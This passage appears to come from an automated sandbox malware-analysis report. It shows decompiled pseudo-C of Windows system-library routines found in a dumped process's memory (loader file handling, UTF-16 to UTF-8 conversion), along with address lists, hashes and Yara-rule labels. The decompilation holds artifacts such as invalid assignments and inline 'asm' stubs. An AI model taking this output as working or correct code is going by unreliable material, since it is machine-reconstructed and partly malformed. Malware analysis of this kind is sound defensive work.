				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0305D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E03032280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L03034620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0305F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0302FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x310b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0305B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x03045142
0x0304514c
0x03045150
0x03045157
0x03045159
0x0304515e
0x03045165
0x03045169
0x0304516c
0x03045172
0x03045176
0x0304517a
0x0304517a
0x0304517a
0x0304517f
0x03086d8b
0x03086d8e
0x03086d91
0x03086d95
0x03086d98
0x03086d9c
0x03086da0
0x03086da3
0x03086da7
0x03086e26
0x03086e26
0x03086e2a
0x030451f9
0x030451f9
0x030451fe
0x03086e33
0x03086e33
0x03086e39
0x03086e3d
0x03086e46
0x03086e50
0x00000000
0x00000000
0x03086e52
0x03086e53
0x03086e56
0x03086e5d
0x00000000
0x00000000
0x00000000
0x03086e5f
0x03086e67
0x03086e77
0x03086e7f
0x03086e80
0x03086e88
0x03086e90
0x03086e9f
0x03086ea5
0x03086ea9
0x03086eb1
0x03086ebf
0x00000000
0x00000000
0x03086ecf
0x03086ed3
0x00000000
0x00000000
0x03086edb
0x03086ede
0x03086ee1
0x03086ee8
0x03086eeb
0x03086eed
0x03086ef0
0x03086ef4
0x03086ef8
0x03086efc
0x00000000
0x00000000
0x03086f0d
0x03086f11
0x03086f32
0x03086f37
0x03086f3b
0x03086f3e
0x03086f41
0x03086f46
0x00000000
0x00000000
0x03086f4c
0x03086f50
0x03086f50
0x03086f54
0x03086f62
0x03086f65
0x03086f6d
0x03086f7b
0x03086f7b
0x03086f93
0x03086f98
0x03086fa0
0x03086fa6
0x03086fb3
0x03086fb6
0x03086fbf
0x03086fc1
0x03086fd5
0x03086fda
0x03086fda
0x03086fdd
0x03086fe2
0x03086fe7
0x03086feb
0x03086fef
0x03086ff3
0x0304520c
0x0304520c
0x0304520f
0x03045215
0x03045234
0x0304523a
0x0304523a
0x03045244
0x03045245
0x03045246
0x03045251
0x03045251
0x03086f13
0x03086f17
0x03086f17
0x03086f18
0x03086f1b
0x03086f1f
0x03086f23
0x00000000
0x03086f28
0x03045204
0x03045204
0x03045208
0x00000000
0x03045208
0x03045185
0x03045188
0x0304518a
0x0304518e
0x03045195
0x03086db1
0x03086db5
0x03086db9
0x0304519b
0x0304519b
0x0304519e
0x030451a7
0x030451a9
0x030451a9
0x030451b5
0x030451b8
0x030451bb
0x030451be
0x030451c1
0x030451c5
0x030451c9
0x030451cd
0x030451cd
0x030451d8
0x030451dc
0x030451e0
0x03086dcc
0x03086dd0
0x03086dd5
0x03086ddd
0x03086de1
0x03086de1
0x03086de5
0x03086deb
0x03086df1
0x03086df7
0x03086dfd
0x03086e01
0x03086e05
0x03086e09
0x03086e0d
0x03086e11
0x03086e11
0x030451eb
0x03086e1a
0x03086e1f
0x03086e21
0x03086e23
0x00000000
0x030451f1
0x030451f1
0x00000000
0x030451f1

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18532c752cacf260d35d78b794a041253b42bb31cba407e1943b56457db9b20d
Instruction ID: 3d2a1dfac419a2c94a6ebf6273ce05d6cf584dc96dbf8af9f05d124be64cf1a0
Opcode Fuzzy Hash: 18532c752cacf260d35d78b794a041253b42bb31cba407e1943b56457db9b20d
Instruction Fuzzy Hash: 8FC111B550A3808FD354CF28C580A5AFBF1BF89304F18896EF9998B352D771E945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 030403E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E030403E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x310d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E03040548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0305B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0302B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x3107c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E03037D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E03037D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E03097016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E03059830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E030969A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x3107c04 != 0) {
						_t118 = _v12;
						_t120 = E0309A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x3107bd8;
						if( *0x3107bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E030595D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E030599A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E03093540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0301B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0305AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x3108474 - 3;
										if( *0x3108474 != 3) {
											 *0x31079dc =  *0x31079dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E03037D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E03037D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E03097016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x3108708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x3107b00; // 0x0
							asm("ror esi, cl");
							 *0x310b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E030595D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E03027F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x030403f1
0x030403f7
0x030403f9
0x030403fb
0x030403fd
0x03040400
0x0304040a
0x03084c7a
0x03040537
0x03040547
0x03040410
0x03040410
0x03040414
0x03040417
0x0304041a
0x03040421
0x03040424
0x0304042b
0x0304043b
0x0304043e
0x0304043f
0x0304043f
0x03040446
0x03040449
0x0304044c
0x0304044f
0x03040459
0x03084c8d
0x0304045f
0x0304045f
0x0304045f
0x03040467
0x03084c97
0x03084c9d
0x03084ca4
0x03084caa
0x03084caf
0x03084cb1
0x03084cc3
0x03084cb3
0x03084cbc
0x03084cbc
0x03084cc8
0x03084ccb
0x03084cd7
0x03084cda
0x03084cdf
0x03084cdf
0x03084ccb
0x03084ca4
0x0304046d
0x0304046f
0x0304046f
0x03040471
0x03040476
0x0304047a
0x0304047b
0x03040483
0x03040489
0x0304048d
0x00000000
0x00000000
0x03084ce9
0x03084cef
0x03084d22
0x03084d22
0x00000000
0x03084d22
0x03084cf1
0x03084cf7
0x00000000
0x00000000
0x03084cf9
0x03084cff
0x00000000
0x00000000
0x03084d05
0x03084d07
0x00000000
0x00000000
0x03084d0d
0x03084d0f
0x03084d14
0x03084d16
0x00000000
0x00000000
0x03084d1c
0x03084d1c
0x03040499
0x03040535
0x03040535
0x00000000
0x03040535
0x030404a6
0x03084d2c
0x03084d37
0x03084d39
0x03084d3b
0x00000000
0x00000000
0x03084d41
0x03084d48
0x03040527
0x0304052b
0x0304052d
0x03040530
0x03040530
0x00000000
0x0304052b
0x03084d4e
0x030404ac
0x030404ac
0x030404af
0x030404b2
0x030404b7
0x030404b9
0x030404bb
0x030404bd
0x030404bf
0x030404c5
0x030404c9
0x03084d53
0x03084d59
0x03084db9
0x03084dba
0x03084dbf
0x03084dc2
0x03084dc4
0x03084dc7
0x03084dce
0x00000000
0x03084dce
0x03084d5b
0x03084d61
0x00000000
0x00000000
0x03084d63
0x03084d69
0x00000000
0x00000000
0x03084d6b
0x03084d6e
0x03084d74
0x03084d76
0x03084d7c
0x03084d7e
0x03084d84
0x03084d89
0x03084d8c
0x03084d8d
0x03084d92
0x03084d95
0x03084d96
0x03084d98
0x03084d9a
0x03084d9f
0x03084da4
0x03084da6
0x03084da8
0x03084daf
0x03084db1
0x03084db1
0x03084daf
0x03084da6
0x03084d84
0x03084d7c
0x00000000
0x03084d74
0x030404d6
0x03084de1
0x030404dc
0x030404dc
0x030404dc
0x030404e4
0x03084deb
0x03084df1
0x03084df8
0x03084dfe
0x03084e03
0x03084e05
0x03084e17
0x03084e07
0x03084e10
0x03084e10
0x03084e1c
0x03084e1f
0x03084e35
0x03084e35
0x03084e1f
0x03084df8
0x030404f1
0x030404fa
0x03084e3f
0x03084e47
0x03084e5b
0x03084e61
0x03084e67
0x03084e69
0x03084e71
0x03084e73
0x03040500
0x03040500
0x03040500
0x030404fa
0x03040508
0x0304051d
0x0304051d
0x0304051f
0x03040524
0x00000000
0x03040524
0x03040515
0x03040517
0x03084e7a
0x03084e7c
0x00000000
0x00000000
0x03084e85
0x00000000
0x03084e85
0x00000000
0x03040517

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5126f7091006f1c98333f12715d83dbcdee98b6dd7f220165fa9acb773b9e1bc
Instruction ID: 1983021056bfb1deca3d03f35e53735828c54c07dc5b158c65c07765bc6314b3
Opcode Fuzzy Hash: 5126f7091006f1c98333f12715d83dbcdee98b6dd7f220165fa9acb773b9e1bc
Instruction Fuzzy Hash: FE912BB1E023159FDB21EB69D844BAEF7E8EB45728F0A0271EA50BB2D0D7749D40C791

Uniqueness

Uniqueness Score: -1.00%

Function 0304EBB0, Relevance: .2, Instructions: 250
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0304EBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E0304ED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}

0x0304ebb8
0x0304ebbf
0x0304ebc1
0x0304ebc6
0x00000000
0x0308b6d6
0x0304ebcd
0x0304ebd2
0x0304ec95
0x0308b6e0
0x0304ec9b
0x0304eca1
0x0304eca1
0x0304ec89
0x00000000
0x0304ec89
0x0304ebd8
0x0304ebdd
0x0308b6ea
0x00000000
0x0304ebe3
0x0304ebe5
0x0304ebe7
0x0304ebef
0x0304ebf2
0x00000000
0x0304ebf5
0x00000000
0x0304ebf5
0x0304ebf5
0x0304ebf7
0x0308b6f6
0x0304ec7c
0x0304ec7c
0x0304ec7f
0x0304ec82
0x0304ec87
0x00000000
0x0304ec87
0x0304ec1a
0x0304ec1a
0x0304ec25
0x0308b725
0x0308b72c
0x0308b72c
0x0304ec2d
0x0304ec31
0x0308b73c
0x0308b744
0x0308b748
0x0308b748
0x0308b749
0x0308b749
0x0308b74a
0x0308b74a
0x0304ec3e
0x0308b860
0x00000000
0x0304ec44
0x0304ec47
0x0308b750
0x0308b758
0x0308b767
0x0308b775
0x0308b77c
0x0308b77f
0x0308b769
0x0308b76c
0x0308b76c
0x0308b781
0x0308b788
0x0308b78b
0x0308b75a
0x0308b75d
0x0308b75d
0x0308b78d
0x0308b792
0x0308b793
0x0308b793
0x0304ec54
0x0304ec56
0x0304ec57
0x0304ec59
0x0304ec5e
0x0304ecaa
0x0304ed16
0x0304ed16
0x0304ecac
0x0304ecaf
0x0304ecb4
0x0304ecb6
0x0304ecb6
0x0304ecb9
0x0304ecbf
0x0308b7c1
0x0308b7c8
0x0308b7d3
0x0308b7db
0x0308b7ec
0x0308b858
0x00000000
0x0308b858
0x0308b7ee
0x0308b7f1
0x0308b7f4
0x0308b7ff
0x0308b850
0x00000000
0x0308b850
0x0308b80a
0x0308b813
0x0308b81c
0x0308b81d
0x0308b822
0x0308b825
0x0308b828
0x0308b831
0x0308b832
0x0308b837
0x0308b840
0x0308b842
0x0308b845
0x0308b848
0x00000000
0x0308b848
0x0308b7df
0x00000000
0x0308b7df
0x0308b7cc
0x00000000
0x0308b7cc
0x0304ecc5
0x0304ecc7
0x0304eccb
0x0308b79b
0x0308b79e
0x0308b7a4
0x00000000
0x00000000
0x0308b7a6
0x0308b7a8
0x0308b7a8
0x0304ecd3
0x00000000
0x00000000
0x00000000
0x00000000
0x0304ecd5
0x0304ecd5
0x0304ecd5
0x0304ecd8
0x0304ecda
0x0304ece4
0x00000000
0x00000000
0x0304ecea
0x0304eced
0x0304ecf0
0x0304ecf2
0x0304ecfb
0x0304ecfe
0x0304ed01
0x0304ed06
0x00000000
0x00000000
0x00000000
0x0304ed06
0x0308b7ae
0x0308b7b1
0x0308b7b7
0x00000000
0x00000000
0x0308b7b9
0x0308b7bb
0x0304ed08
0x0304ed08
0x0304ed0c
0x0304ed0c
0x00000000
0x0304ec60
0x0304ec62
0x0304ed0f
0x0304ed0f
0x00000000
0x0304ed0f
0x0304ec68
0x0304ec6c
0x0304ec6f
0x0304ec75
0x0304ec0d
0x0304ec0d
0x0304ec18
0x00000000
0x00000000
0x00000000
0x0304ec18
0x0304ec77
0x0304ec79
0x0304ec79
0x00000000
0x0304ec68
0x0304ec5e
0x0304ec3e
0x0304ebfd
0x0304ec02
0x0308b701
0x0308b70c
0x0308b71b
0x0308b71d
0x0308b71d
0x00000000
0x0308b70c
0x0304ec08
0x0304ec0a
0x00000000
0x0304ec0a
0x0304ebf5
0x0304ebf5

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction ID: 31f79f0d0e9e248d9014c1f32b78b3163647292c2cae0a941b2e2faf26309faf
Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction Fuzzy Hash: 51813B61A073568BDB25DF6CC4C027EFB95FF52204F2C8ABAD8828B341C225DA46D791

Uniqueness

Uniqueness Score: -1.00%

Function 0303AB40, Relevance: .2, Instructions: 240
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

